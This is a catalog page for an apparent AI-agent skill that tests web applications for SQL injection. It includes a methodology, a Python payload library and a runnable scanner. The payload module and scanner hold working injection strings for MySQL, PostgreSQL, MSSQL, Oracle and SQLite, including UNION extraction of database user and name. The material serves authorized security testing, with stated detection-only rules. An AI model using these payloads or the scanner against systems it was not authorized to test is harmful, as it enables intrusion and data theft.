Back to skills
SkillHub ClubShip Full StackFull StackTesting

sql-injection-testing

Validate SQL injection vulnerabilities (including blind SQLi) across time-based, error-based, boolean-based, UNION-based, stacked-query, and out-of-band patterns. Use when testing CWE-89 (SQL Injection), CWE-564 (Hibernate SQL Injection), and related SQL injection classes across MySQL, PostgreSQL, MSSQL, Oracle, and SQLite targets.

Packaged view

This page reorganizes the original catalog entry around fit, installability, and workflow context first. The original raw source lives below.

Stars
257
Hot score
98
Updated
March 20, 2026
Overall rating
C3.7
Composite score
3.7
Best-practice grade
B71.9

Install command

npx @skill-hub/cli install anshumanbh-securevibes-sql-injection-testing

Repository

anshumanbh/securevibes

Skill path: packages/core/securevibes/skills/dast/sql-injection-testing

Validate SQL injection vulnerabilities (including blind SQLi) across time-based, error-based, boolean-based, UNION-based, stacked-query, and out-of-band patterns. Use when testing CWE-89 (SQL Injection), CWE-564 (Hibernate SQL Injection), and related SQL injection classes across MySQL, PostgreSQL, MSSQL, Oracle, and SQLite targets.

Open repository

Best for

Primary workflow: Ship Full Stack.

Technical facets: Full Stack, Testing.

Target audience: everyone.

License: Unknown.

Original source

Catalog source: SkillHub Club.

Repository owner: anshumanbh.

This is still a mirrored public skill entry. Review the repository before installing into production workflows.

What it helps with

  • Install sql-injection-testing into Claude Code, Codex CLI, Gemini CLI, or OpenCode workflows
  • Review https://github.com/anshumanbh/securevibes before adding sql-injection-testing to shared team environments
  • Use sql-injection-testing for development workflows

Works across

Claude CodeCodex CLIGemini CLIOpenCode

Favorites: 0.

Sub-skills: 0.

Aggregator: No.

Original source / Raw SKILL.md

---
name: sql-injection-testing
description: Validate SQL injection vulnerabilities (including blind SQLi) across time-based, error-based, boolean-based, UNION-based, stacked-query, and out-of-band patterns. Use when testing CWE-89 (SQL Injection), CWE-564 (Hibernate SQL Injection), and related SQL injection classes across MySQL, PostgreSQL, MSSQL, Oracle, and SQLite targets.
allowed-tools: Read, Write, Bash
---

# SQL Injection Testing Skill

## Purpose
Validate SQL injection (including blind SQLi) by injecting SQL syntax into user-controlled inputs and observing:
- **Time-based delays** (blind)
- **Error messages** (error-based)
- **Boolean/content differences** (blind)
- **Data extraction via UNION**
- **Stacked queries** where supported
- **Out-of-band interactions** (DNS/HTTP callbacks) when infra allows

## Vulnerability Types Covered

### 1. Time-Based Blind SQLi (CWE-89)
Inject time-delay functions and detect response latency.

**Detection Methods:** `SLEEP(5)`, `pg_sleep(5)`, `WAITFOR DELAY '0:0:5'`, heavy functions (e.g., `randomblob()` for SQLite).

### 2. Boolean-Based Blind SQLi (CWE-89)
Inject true/false conditions and compare content/length/status.

**Detection Methods:** `' OR '1'='1` vs `' OR '1'='2`, `AND 1=1` vs `AND 1=2`.

### 3. Error-Based SQLi (CWE-89)
Trigger SQL parser errors and observe verbose error responses.

**Detection Methods:** stray quote/backtick, type-cast errors, `extractvalue()/updatexml()` (MySQL), `CAST('a' AS INT)` (PostgreSQL/MSSQL).

### 4. UNION-Based SQLi (CWE-89)
Use UNION to extract data when column counts align.

**Detection Methods:** `UNION SELECT NULL,NULL`, `ORDER BY N` probing for column count.

### 5. Stacked Queries (CWE-89)
Inject additional statements when DB/driver permits (e.g., MSSQL `; WAITFOR`, PostgreSQL `; SELECT pg_sleep(5)`).

### 6. Out-of-Band SQLi (CWE-89)
Detect DNS/HTTP callbacks via `load_file()`, `xp_dirtree`, or UTL_HTTP/UTL_INADDR when response-based detection is blocked (use only if callback infra is authorized).

### 7. ORM/Framework-Specific (CWE-564)
Hibernate/JPA or query-builder misuse leading to SQLi (parameter concatenation, unsafe `createQuery`).

## Database-Specific Notes

| Database | Time-Based | Error-Based | Boolean-Based | UNION | Stacked Queries |
|----------|------------|-------------|---------------|-------|-----------------|
| MySQL/MariaDB | `SLEEP(5)` | ✓ | ✓ | ✓ | Limited |
| PostgreSQL | `pg_sleep(5)` | ✓ | ✓ | ✓ | ✓ (`; SELECT ...`) |
| MSSQL | `WAITFOR DELAY '0:0:5'` | ✓ | ✓ | ✓ | ✓ |
| Oracle | `dbms_pipe.receive_message` | ✓ | ✓ | ✓ | Limited |
| SQLite | No native sleep; use heavy ops (`randomblob`) | ✓ | ✓ | Partial | No |

## Prerequisites
- Target reachable; SQL-backed functionality identified (endpoints, forms, headers, cookies, path params).
- If authentication required: test accounts available (low-priv + optional admin) or mark paths UNVALIDATED.
- Know (or infer) DB type to choose correct payloads; default to generic when unknown.
- VULNERABILITIES.json with suspected SQLi findings if provided.

## Testing Methodology

### Phase 1: Identify Injection Points
- URL params, POST bodies (JSON/form), headers, cookies, path segments.
- Look for string interpolation, query concatenation, ORM custom queries.

### Phase 2: Establish Baseline
- Send a benign request; record status, content length, and response time.
- Note WAF/rate-limit behaviors.

### Phase 3: Execute SQLi Tests

**Time-Based (Blind):**
```python
payload = "123' OR SLEEP(5)--"
resp_time = send(payload)
if resp_time > baseline_time + 4.5:
    status = "VALIDATED"
```

**Boolean-Based (Blind):**
```python
true_p = "123' OR '1'='1"
false_p = "123' OR '1'='2"
len_true = len(send(true_p).text)
len_false = len(send(false_p).text)
if abs(len_true - len_false) >= 50:
    status = "VALIDATED"
```

**Error-Based:**
```python
payload = "123'"
resp = send(payload)
if any(err in resp.text.lower() for err in sql_errors):
    status = "VALIDATED"
```

**UNION/Stacked Probing:**
- `ORDER BY` incrementally to find column count.
- `UNION SELECT NULL,...` until count matches; watch for 200 vs 500.
- For stacked-capable DBs: append `; SELECT pg_sleep(5)` or `; WAITFOR DELAY '0:0:5'`.

**Out-of-Band (only if infra-approved):**
- Use controlled collaborator domain; record DNS/HTTP hits.
- Stop if any unexpected external interaction occurs.

### Phase 4: Classification Logic

| Status | Meaning |
|--------|---------|
| **VALIDATED** | Clear SQLi indicators (delay, error, boolean diff, data via UNION/stacked, OOB hit) |
| **FALSE_POSITIVE** | No indicators; behavior unchanged |
| **PARTIAL** | Mixed/weak signals (small deltas, inconsistent responses) |
| **UNVALIDATED** | Blocked, error, or insufficient evidence |

### Phase 5: Capture Evidence
Capture minimal structured evidence (redact PII/secrets, truncate to 8KB, hash full response). Include:
- `status`, `injection_type`, `cwe`
- Baseline request (url/method/status/time/hash)
- Test request (url/method/status/time/hash, or collaborator hit details)
- Payload used
- Note if truncated and original size

### Phase 6: Safety Rules
- Detection-only payloads; **never** destructive statements (DROP/DELETE/TRUNCATE/UPDATE/INSERT).
- Avoid data exfiltration; prefer boolean/time-based confirmation.
- Do not send OOB callbacks unless explicitly authorized.
- Respect rate limits; add delays between time-based probes.
- Redact credentials, tokens, and personal data in evidence.

## Output Guidelines
- Keep responses concise (1-4 sentences).
- Include endpoint, payload, detection method, and impact.

**Validated examples:**
```
Time-based SQLi on /api/users?id - SLEEP(5) payload caused 5.1s delay (CWE-89). Evidence: path/to/evidence.json
Boolean-based SQLi on /products - response length differs for true vs false condition (CWE-89). Evidence: path/to/evidence.json
Error-based SQLi on /login - SQL syntax error returned to client (CWE-89). Evidence: path/to/evidence.json
```

**Unvalidated example:**
```
SQLi test incomplete on /reports - WAF blocked payloads (403). Evidence: path/to/evidence.json
```

## CWE Mapping

**Primary CWEs (DAST-testable):**
- **CWE-89:** Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
- **CWE-564:** SQL Injection: Hibernate (ORM-specific variant of CWE-89)

**Parent/Related CWEs (context):**
- **CWE-943:** Improper Neutralization of Special Elements in Data Query Logic (parent class of CWE-89)
- **CWE-74:** Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') (grandparent)
- **CWE-20:** Improper Input Validation (related - root cause)

**Note:** CWE-89 is ranked #2 in MITRE's 2025 CWE Top 25 Most Dangerous Software Weaknesses.

## Notable CVEs (examples)
- **CVE-2023-34362 (MOVEit Transfer):** Pre-auth SQLi leading to mass data exfiltration; exploited by Cl0p ransomware.
- **CVE-2024-27956 (WordPress Automatic Plugin):** Unauthenticated SQLi allowing privilege escalation.
- **CVE-2021-27065 (Microsoft Exchange ProxyLogon chain):** Post-auth SQLi in OWA contributing to RCE chain.
- **CVE-2019-2725 (Oracle WebLogic):** Unauthenticated SQLi leading to RCE.
- **CVE-2017-5638 (Apache Struts):** OGNL injection (related pattern) leading to RCE via Content-Type header.
- **CVE-2014-3704 (Drupal SA-CORE-2014-005):** SQLi via Drupal 7/8 form API ("Drupalgeddon").

## Safety Reminders
- ONLY test against user-approved targets; stop if production protections trigger.
- Do not log or store sensitive data; redact in evidence.
- Prefer parameterized queries and least-privileged DB accounts in mitigations.

## Reference Implementations
- See `reference/sql_payloads.py` for SQLi payloads by DB and detection type.
- See `reference/validate_sqli.py` for a SQLi-focused validation flow (time/error/boolean/UNION/stacked).
- See `examples.md` for concrete SQLi scenarios and evidence formats.


---

## Referenced Files

> The following files are referenced in this skill and included for context.

### reference/sql_payloads.py

```python
"""
SQL injection payload helpers grouped by detection type and database.
These are reference payloads; adjust to the target application's context.
"""

from typing import Any, Dict, List


def get_time_payloads(db_type: str = "generic") -> List[Dict[str, Any]]:
    payloads = {
        "mysql": [
            {"payload": "' OR SLEEP(5)--", "delay": 5},
            {"payload": "1 AND SLEEP(5)--", "delay": 5},
        ],
        "postgres": [
            {"payload": "'; SELECT pg_sleep(5)--", "delay": 5},
            {"payload": "' OR pg_sleep(5)--", "delay": 5},
        ],
        "mssql": [
            {"payload": "'; WAITFOR DELAY '0:0:5'--", "delay": 5},
            {"payload": "' WAITFOR DELAY '0:0:5'--", "delay": 5},
        ],
        "oracle": [
            {"payload": "' AND dbms_pipe.receive_message(''a'',5)--", "delay": 5},
        ],
        "sqlite": [
            {"payload": "' AND 1=randomblob(500000000)--", "delay": 3},
        ],
        "generic": [
            {"payload": "' OR SLEEP(5)--", "delay": 5},
            {"payload": "'; SELECT pg_sleep(5)--", "delay": 5},
            {"payload": "'; WAITFOR DELAY '0:0:5'--", "delay": 5},
        ],
    }
    return payloads.get(db_type, payloads["generic"])


def get_error_payloads(db_type: str = "generic") -> List[Dict[str, Any]]:
    payloads = {
        "generic": [
            {"payload": "'", "type": "single_quote"},
            {"payload": '"', "type": "double_quote"},
            {"payload": "`", "type": "backtick"},
            {"payload": "1'1", "type": "syntax_error"},
            {"payload": "1 AND 1=CONVERT(int,'a')--", "type": "type_conversion"},
            {"payload": "' AND extractvalue(1,concat(0x7e,version()))--", "type": "extractvalue"},
        ],
        "sqlite": [
            {"payload": "'", "type": "single_quote"},
            {"payload": "' OR '", "type": "unclosed_string"},
            {"payload": "1' AND '1", "type": "syntax_break"},
            {"payload": "' UNION SELECT 1--", "type": "union_error"},
            {"payload": "' ORDER BY 9999--", "type": "order_by_error"},
            {"payload": "1; SELECT 1", "type": "stacked_query"},
        ],
        "mysql": [
            {"payload": "'", "type": "single_quote"},
            {"payload": "' AND extractvalue(1,concat(0x7e,version()))--", "type": "extractvalue"},
            {"payload": "' AND updatexml(1,concat(0x7e,version()),1)--", "type": "updatexml"},
        ],
        "postgres": [
            {"payload": "'", "type": "single_quote"},
            {"payload": "' AND 1=CAST('a' AS INTEGER)--", "type": "cast_error"},
        ],
    }
    return payloads.get(db_type, payloads["generic"])


def get_boolean_payloads() -> List[Dict[str, Any]]:
    return [
        {"true_payload": "' OR '1'='1", "false_payload": "' OR '1'='2"},
        {"true_payload": "' OR 1=1--", "false_payload": "' OR 1=2--"},
        {"true_payload": "1 OR 1=1", "false_payload": "1 AND 1=2"},
        {"true_payload": "' OR 'a'='a", "false_payload": "' OR 'a'='b"},
        {"true_payload": "1' OR '1'='1", "false_payload": "1' AND '1'='2"},
        {"true_payload": "' OR 1=1 OR '1'='1", "false_payload": "' AND 1=2 AND '1'='1"},
    ]


def get_union_payloads() -> List[Dict[str, Any]]:
    return [
        {"payload": "' ORDER BY 3--", "type": "order_by_probe"},
        {"payload": "' ORDER BY 5--", "type": "order_by_probe"},
        {"payload": "' UNION SELECT NULL--", "type": "union_null"},
        {"payload": "' UNION SELECT NULL,NULL--", "type": "union_null_null"},
        {"payload": "' UNION SELECT NULL,NULL,user(),database()--", "type": "union_extract"},
    ]


def get_stacked_payloads(db_type: str = "generic") -> List[Dict[str, Any]]:
    payloads = {
        "postgres": [
            {"payload": "1; SELECT pg_sleep(5)--", "delay": 5},
        ],
        "mssql": [
            {"payload": "1; WAITFOR DELAY '0:0:5'--", "delay": 5},
        ],
        "generic": [
            {"payload": "1; SELECT pg_sleep(5)--", "delay": 5},
        ],
    }
    return payloads.get(db_type, payloads["generic"])

```

### reference/validate_sqli.py

```python
#!/usr/bin/env python3
"""
SQL injection validation helper (reference only).

Implements time-based, boolean-based, error-based, UNION, and stacked query checks.
Adapt endpoints/methods/payloads to the target application before use.
"""
import argparse
import hashlib
import json
import re
import time
from pathlib import Path
from typing import Any, Dict, List, Optional
from urllib.parse import quote

import requests

from sql_payloads import (
    get_boolean_payloads,
    get_error_payloads,
    get_stacked_payloads,
    get_time_payloads,
    get_union_payloads,
)

MAX_RESPONSE_SIZE = 8 * 1024

SQL_ERROR_PATTERNS = [
    r"sql syntax",
    r"mysql",
    r"postgresql",
    r"oracle",
    r"unclosed quotation",
    r"quoted string not properly terminated",
    r"syntax error",
    r"ORA-\d+",
    r"PG::SyntaxError",
    r"com\.mysql\.jdbc",
    r"org\.postgresql",
    r"sqlite",
    r"sqlite3",
    r"SQLite3::SQLException",
    r"sqlite3\.OperationalError",
    r"sqlite3\.ProgrammingError",
    r"near \".*\": syntax error",
    r"unrecognized token",
    r"no such column",
    r"no such table",
    r"SQLITE_ERROR",
    r"SELECTs to the left and right of UNION",
    r"incomplete input",
]


def truncate_and_hash(response_text: str) -> tuple:
    full_hash = hashlib.sha256(response_text.encode()).hexdigest()
    truncated = response_text[:MAX_RESPONSE_SIZE]
    metadata = {
        "truncated": len(response_text) > MAX_RESPONSE_SIZE,
        "original_size_bytes": len(response_text),
    }
    return truncated, f"sha256:{full_hash}", metadata


def has_sql_errors(content: str) -> bool:
    content_lower = content.lower()
    for pattern in SQL_ERROR_PATTERNS:
        if re.search(pattern, content_lower, re.IGNORECASE):
            return True
    return False


def baseline_request(
    url: str, param: str, value: str, headers: Optional[Dict], timeout: int
) -> Dict[str, Any]:
    baseline_url = f"{url}?{param}={quote(value)}"
    start = time.time()
    resp = requests.get(baseline_url, headers=headers, timeout=timeout)
    duration = time.time() - start
    snippet, resp_hash, meta = truncate_and_hash(resp.text)
    return {
        "url": baseline_url,
        "method": "GET",
        "status": resp.status_code,
        "response_time_seconds": round(duration, 3),
        "response_snippet": snippet[:500],
        "response_hash": resp_hash,
        **meta,
    }


def test_time_based(
    url: str, param: str, value: str, headers: Optional[Dict], timeout: int, db: str
) -> Dict[str, Any]:
    baseline = baseline_request(url, param, value, headers, timeout)
    payloads = get_time_payloads(db)

    for entry in payloads:
        payload = value + entry["payload"]
        test_url = f"{url}?{param}={quote(payload)}"
        try:
            start = time.time()
            resp = requests.get(test_url, headers=headers, timeout=timeout + 10)
            duration = time.time() - start
        except requests.Timeout:
            duration = timeout + 10
            resp = None
        except requests.RequestException as exc:
            return {"status": "UNVALIDATED", "reason": f"Request failed: {exc}"}

        delay = duration - baseline["response_time_seconds"]
        if delay >= entry.get("delay", 5) - 0.5:
            snippet, resp_hash, meta = truncate_and_hash(resp.text if resp else "")
            return {
                "status": "VALIDATED",
                "injection_type": "sql_injection_time_based",
                "cwe": "CWE-89",
                "baseline": baseline,
                "test": {
                    "url": test_url,
                    "status": resp.status_code if resp else None,
                    "response_time_seconds": round(duration, 3),
                    "response_snippet": snippet[:500],
                    "response_hash": resp_hash,
                    **meta,
                },
                "evidence": f"Time-based SQLi: {delay:.2f}s delay",
                "payload_used": payload,
            }

    return {
        "status": "FALSE_POSITIVE",
        "injection_type": "sql_injection_time_based",
        "baseline": baseline,
        "evidence": "No significant delay detected",
    }


def test_error_based(
    url: str, param: str, value: str, headers: Optional[Dict], timeout: int, db: str
) -> Dict[str, Any]:
    baseline = baseline_request(url, param, value, headers, timeout)
    for entry in get_error_payloads(db):
        payload = value + entry["payload"]
        test_url = f"{url}?{param}={quote(payload)}"
        try:
            resp = requests.get(test_url, headers=headers, timeout=timeout)
        except requests.RequestException:
            continue

        if has_sql_errors(resp.text):
            snippet, resp_hash, meta = truncate_and_hash(resp.text)
            return {
                "status": "VALIDATED",
                "injection_type": "sql_injection_error_based",
                "cwe": "CWE-89",
                "baseline": baseline,
                "test": {
                    "url": test_url,
                    "status": resp.status_code,
                    "response_snippet": snippet[:500],
                    "response_hash": resp_hash,
                    **meta,
                },
                "evidence": "Error-based SQLi: SQL parser error returned",
                "payload_used": payload,
            }

    return {
        "status": "FALSE_POSITIVE",
        "injection_type": "sql_injection_error_based",
        "baseline": baseline,
        "evidence": "No SQL error indicators detected",
    }


def test_boolean_based(
    url: str, param: str, value: str, headers: Optional[Dict], timeout: int
) -> Dict[str, Any]:
    baseline = baseline_request(url, param, value, headers, timeout)
    payload_pairs = get_boolean_payloads()

    for pair in payload_pairs:
        true_payload = value + pair["true_payload"]
        false_payload = value + pair["false_payload"]

        try:
            true_url = f"{url}?{param}={quote(true_payload)}"
            false_url = f"{url}?{param}={quote(false_payload)}"
            true_resp = requests.get(true_url, headers=headers, timeout=timeout)
            false_resp = requests.get(false_url, headers=headers, timeout=timeout)
        except requests.RequestException:
            continue

        len_true = len(true_resp.text)
        len_false = len(false_resp.text)
        len_diff = abs(len_true - len_false)

        if len_diff >= 50 or true_resp.status_code != false_resp.status_code:
            true_snippet, true_hash, true_meta = truncate_and_hash(true_resp.text)
            false_snippet, false_hash, false_meta = truncate_and_hash(false_resp.text)
            return {
                "status": "VALIDATED",
                "injection_type": "sql_injection_boolean_based",
                "cwe": "CWE-89",
                "baseline": baseline,
                "test": {
                    "true_condition": {
                        "url": true_url,
                        "status": true_resp.status_code,
                        "content_length": len_true,
                        "response_hash": true_hash,
                        **true_meta,
                    },
                    "false_condition": {
                        "url": false_url,
                        "status": false_resp.status_code,
                        "content_length": len_false,
                        "response_hash": false_hash,
                        **false_meta,
                    },
                },
                "evidence": f"Boolean-based SQLi: length delta {len_diff} bytes",
                "payload_used": pair,
            }

    return {
        "status": "FALSE_POSITIVE",
        "injection_type": "sql_injection_boolean_based",
        "baseline": baseline,
        "evidence": "No significant difference between true/false conditions",
    }


def test_union_based(
    url: str, param: str, value: str, headers: Optional[Dict], timeout: int
) -> Dict[str, Any]:
    baseline = baseline_request(url, param, value, headers, timeout)
    for entry in get_union_payloads():
        payload = value + entry["payload"]
        test_url = f"{url}?{param}={quote(payload)}"
        try:
            resp = requests.get(test_url, headers=headers, timeout=timeout)
        except requests.RequestException:
            continue

        # Heuristic: status code differs or body grows (UNION success)
        len_delta = len(resp.text) - len(baseline.get("response_snippet", ""))
        if resp.status_code == 200 and abs(len_delta) > 50:
            snippet, resp_hash, meta = truncate_and_hash(resp.text)
            return {
                "status": "VALIDATED",
                "injection_type": "sql_injection_union",
                "cwe": "CWE-89",
                "baseline": baseline,
                "test": {
                    "url": test_url,
                    "status": resp.status_code,
                    "response_snippet": snippet[:500],
                    "response_hash": resp_hash,
                    **meta,
                },
                "evidence": "UNION-based SQLi indicators (body size change)",
                "payload_used": payload,
            }

    return {
        "status": "FALSE_POSITIVE",
        "injection_type": "sql_injection_union",
        "baseline": baseline,
        "evidence": "No UNION indicators detected",
    }


def test_stacked(
    url: str, param: str, value: str, headers: Optional[Dict], timeout: int, db: str
) -> Dict[str, Any]:
    baseline = baseline_request(url, param, value, headers, timeout)
    for entry in get_stacked_payloads(db):
        payload = entry["payload"]
        test_url = f"{url}?{param}={quote(payload)}"
        try:
            start = time.time()
            resp = requests.get(test_url, headers=headers, timeout=timeout + 10)
            duration = time.time() - start
        except requests.Timeout:
            duration = timeout + 10
            resp = None
        except requests.RequestException:
            continue

        delay = duration - baseline["response_time_seconds"]
        if delay >= entry.get("delay", 5) - 0.5:
            snippet, resp_hash, meta = truncate_and_hash(resp.text if resp else "")
            return {
                "status": "VALIDATED",
                "injection_type": "sql_injection_stacked",
                "cwe": "CWE-89",
                "baseline": baseline,
                "test": {
                    "url": test_url,
                    "status": resp.status_code if resp else None,
                    "response_time_seconds": round(duration, 3),
                    "response_snippet": snippet[:500],
                    "response_hash": resp_hash,
                    **meta,
                },
                "evidence": "Stacked query delay detected",
                "payload_used": payload,
            }

    return {
        "status": "FALSE_POSITIVE",
        "injection_type": "sql_injection_stacked",
        "baseline": baseline,
        "evidence": "No stacked query indicators detected",
    }


def run_tests(
    url: str,
    param: str,
    value: str,
    injection_types: List[str],
    headers: Optional[Dict],
    timeout: int,
    db: str,
) -> Dict[str, Any]:
    tests = {
        "time": lambda: test_time_based(url, param, value, headers, timeout, db),
        "error": lambda: test_error_based(url, param, value, headers, timeout, db),
        "boolean": lambda: test_boolean_based(url, param, value, headers, timeout),
        "union": lambda: test_union_based(url, param, value, headers, timeout),
        "stacked": lambda: test_stacked(url, param, value, headers, timeout, db),
    }
    results = {}
    for name in injection_types:
        if name in tests:
            results[name] = tests[name]()
    return results


def parse_headers(header_args: Optional[List[str]]) -> Dict[str, str]:
    headers: Dict[str, str] = {}
    if not header_args:
        return headers
    for h in header_args:
        if ":" not in h:
            continue
        key, value = h.split(":", 1)
        headers[key.strip()] = value.strip()
    return headers


def main() -> int:
    parser = argparse.ArgumentParser(description="SQLi validation helper")
    parser.add_argument("--url", required=True, help="Target URL (without params)")
    parser.add_argument("--param", required=True, help="Parameter to test")
    parser.add_argument("--value", default="1", help="Baseline parameter value")
    parser.add_argument(
        "--types",
        default="time,error,boolean,union",
        help="Comma-separated injection types (time,error,boolean,union,stacked)",
    )
    parser.add_argument(
        "--db",
        default="generic",
        help="Database type (mysql, postgres, mssql, oracle, sqlite, generic)",
    )
    parser.add_argument("--timeout", type=int, default=30, help="Request timeout seconds")
    parser.add_argument("--output", required=True, help="Output JSON file")
    parser.add_argument("--header", action="append", help="Headers (key:value)")

    args = parser.parse_args()
    headers = parse_headers(args.header)
    types = [t.strip() for t in args.types.split(",") if t.strip()]

    results = run_tests(
        url=args.url,
        param=args.param,
        value=args.value,
        injection_types=types,
        headers=headers if headers else None,
        timeout=args.timeout,
        db=args.db,
    )

    output_path = Path(args.output).resolve()
    cwd = Path.cwd().resolve()
    if not str(output_path).startswith(str(cwd)):
        print(f"Error: Output path must be within current directory: {cwd}")
        return 1

    with open(output_path, "w", encoding="utf-8") as f:
        json.dump(results, f, indent=2)

    validated = [k for k, v in results.items() if v.get("status") == "VALIDATED"]
    if validated:
        print(f"VALIDATED: {', '.join(validated)}")
    else:
        print("No SQLi confirmed")

    print(f"Results saved to {output_path}")
    return 0 if not validated else 1


if __name__ == "__main__":
    raise SystemExit(main())

```